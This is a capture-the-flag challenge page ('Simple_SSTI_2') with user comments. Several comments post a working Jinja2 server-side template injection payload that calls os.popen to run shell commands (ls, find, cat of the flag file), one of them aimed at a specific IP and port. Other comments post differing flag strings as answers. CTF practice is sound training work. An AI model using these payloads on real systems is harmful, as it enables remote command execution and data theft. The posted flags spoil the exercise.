Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
15815
提 示:
描 述:
Simple_SSTI_2
评论
z0shell 7月前
举报
/?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}
Masterk 6月前
举报
这是怎么想出来的。。
ABUDUWILI 7月前
举报
flag{ffb1bde14170624274f424caf4406a1a}
L.. 7月前
举报
SSTI模版注入:?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}},拓展?flag={{config.__class__.__init__.__globals__['os'].popen('cat../app/flag').read()}}
qiqiguren 8月前
举报
题解详细步骤:http://t.csdnimg.cn/yZlnn
18476760376 7月前
举报
好用,谢谢
是呆瓜蔚呀 8月前
举报
flag{f231bce175908e8fec554031a6232a55}
htttpss 8月前
举报
flag{c75b03620c73371a0e8f249354e0bd57} ?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}即可
3166235571 8月前
举报
是这个flag{561f38d2a44d42ca8847575a2e144b2b} so easy
2280443298 8月前
举报
{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
zhenbuhuiweb 9月前
举报
flag{d15e0ca95ddb50b992109b24c82cfe5a}
ssln 11月前
举报
114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令